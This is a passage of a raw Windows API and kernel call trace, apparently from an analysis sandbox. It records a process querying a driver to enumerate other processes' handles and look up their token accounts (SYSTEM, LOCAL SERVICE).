(ApcState=0xfffff880053c85d0) [0246.444] PsReleaseProcessExitSynchronization () returned 0x2 [0246.444] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x12 [0246.444] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.445] ObfDereferenceObject (Object=0xfffffa800216a070) returned 0x1 [0246.445] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.445] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.445] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.445] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.445] PsLookupProcessByProcessId (in: ProcessId=0x9c4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.445] PsAcquireProcessExitSynchronization () returned 0x0 [0246.445] KeStackAttachProcess (in: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880053c85d0) [0246.445] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00191b4c0, HandleInformation=0x0) returned 0x0 [0246.445] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.445] PsReleaseProcessExitSynchronization () returned 0x2 [0246.445] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x12 [0246.445] ObQueryNameString (in: Object=0xfffff8a00191b4c0, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.445] ObfDereferenceObject (Object=0xfffff8a00191b4c0) returned 0x1 [0246.445] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.445] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9f4) returned 0xc8 [0246.445] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.445] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002089b30, HandleInformation=0x0) returned 0x0 [0246.445] ObOpenObjectByPointer (in: Object=0xfffffa8002089b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.446] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x3a [0246.446] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0246.446] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.446] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.446] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.446] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.448] CloseHandle (hObject=0xc4) returned 1 [0246.448] CloseHandle (hObject=0xc8) returned 1 [0246.448] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.448] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0246.448] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.448] PsAcquireProcessExitSynchronization () returned 0x0 [0246.448] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880053c85d0) [0246.448] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020b7070, HandleInformation=0x0) returned 0x0 [0246.448] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.448] PsReleaseProcessExitSynchronization () returned 0x2 [0246.448] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x38 [0246.448] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.448] ObfDereferenceObject (Object=0xfffffa80020b7070) returned 0x1 [0246.448] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.449] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.449] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.449] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0246.449] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.449] PsAcquireProcessExitSynchronization () returned 0x0 [0246.449] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880053c85d0) [0246.449] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020ccf20, HandleInformation=0x0) returned 0x0 [0246.449] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.449] PsReleaseProcessExitSynchronization () returned 0x2 [0246.449] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x38 [0246.449] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.449] ObfDereferenceObject (Object=0xfffffa80020ccf20) returned 0x1 [0246.449] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.449] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.449] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.449] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0246.449] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.449] PsAcquireProcessExitSynchronization () returned 0x0 [0246.449] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880053c85d0) [0246.449] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00135e760, HandleInformation=0x0) returned 0x0 [0246.450] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.450] PsReleaseProcessExitSynchronization () returned 0x2 [0246.450] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x38 [0246.450] ObQueryNameString (in: Object=0xfffff8a00135e760, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.450] ObfDereferenceObject (Object=0xfffff8a00135e760) returned 0x3 [0246.450] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.450] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.450] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.450] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0246.450] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.450] PsAcquireProcessExitSynchronization () returned 0x0 [0246.450] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880053c85d0) [0246.450] ObReferenceObjectByHandle (in: Handle=0x11c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0246.450] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.450] PsReleaseProcessExitSynchronization () returned 0x2 [0246.450] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x38 [0246.450] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.450] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0246.450] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.451] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.451] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.451] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0246.451] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.451] PsAcquireProcessExitSynchronization () returned 0x0 [0246.451] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880053c85d0) [0246.451] ObReferenceObjectByHandle (in: Handle=0x128, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0246.451] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.451] PsReleaseProcessExitSynchronization () returned 0x2 [0246.451] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x38 [0246.451] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.451] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0246.451] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.451] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.451] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.451] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0246.451] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.451] PsAcquireProcessExitSynchronization () returned 0x0 [0246.451] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880053c85d0) [0246.451] ObReferenceObjectByHandle (in: Handle=0x1ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003662600, HandleInformation=0x0) returned 0x0 [0246.451] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.452] PsReleaseProcessExitSynchronization () returned 0x2 [0246.452] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x38 [0246.452] ObQueryNameString (in: Object=0xfffffa8003662600, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.452] ObfDereferenceObject (Object=0xfffffa8003662600) returned 0x1 [0246.452] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.452] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.452] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.452] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0246.452] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.452] PsAcquireProcessExitSynchronization () returned 0x0 [0246.452] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880053c85d0) [0246.452] ObReferenceObjectByHandle (in: Handle=0x1b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80116ab630, HandleInformation=0x0) returned 0x0 [0246.452] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.452] PsReleaseProcessExitSynchronization () returned 0x2 [0246.452] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x38 [0246.452] ObQueryNameString (in: Object=0xfffffa80116ab630, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.453] ObfDereferenceObject (Object=0xfffffa80116ab630) returned 0x2 [0246.453] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.453] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb40) returned 0xc8 [0246.453] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.453] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa800287e060, HandleInformation=0x0) returned 0x0 [0246.453] ObOpenObjectByPointer (in: Object=0xfffffa800287e060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.453] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4d [0246.453] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0246.453] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.453] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.453] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.453] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.455] CloseHandle (hObject=0xc4) returned 1 [0246.456] CloseHandle (hObject=0xc8) returned 1 [0246.456] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.456] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0246.456] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.456] PsAcquireProcessExitSynchronization () returned 0x0 [0246.456] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.456] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001e86f20, HandleInformation=0x0) returned 0x0 [0246.456] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.456] PsReleaseProcessExitSynchronization () returned 0x2 [0246.456] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.456] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.456] ObfDereferenceObject (Object=0xfffffa8001e86f20) returned 0x1 [0246.456] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.456] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.456] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.456] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0246.456] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.456] PsAcquireProcessExitSynchronization () returned 0x0 [0246.456] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.456] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037a0a20, HandleInformation=0x0) returned 0x0 [0246.456] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.457] PsReleaseProcessExitSynchronization () returned 0x2 [0246.457] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.457] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.457] ObfDereferenceObject (Object=0xfffffa80037a0a20) returned 0x1 [0246.457] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.457] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.457] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.457] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0246.457] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.457] PsAcquireProcessExitSynchronization () returned 0x0 [0246.457] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.457] ObReferenceObjectByHandle (in: Handle=0xd0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0246.457] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.457] PsReleaseProcessExitSynchronization () returned 0x2 [0246.457] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.457] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.457] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0246.457] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.457] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.457] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.457] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0246.457] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.457] PsAcquireProcessExitSynchronization () returned 0x0 [0246.458] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.458] ObReferenceObjectByHandle (in: Handle=0xdc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0246.458] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.458] PsReleaseProcessExitSynchronization () returned 0x2 [0246.458] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.458] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.458] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0246.458] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.458] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.458] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.458] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0246.458] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.458] PsAcquireProcessExitSynchronization () returned 0x0 [0246.458] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 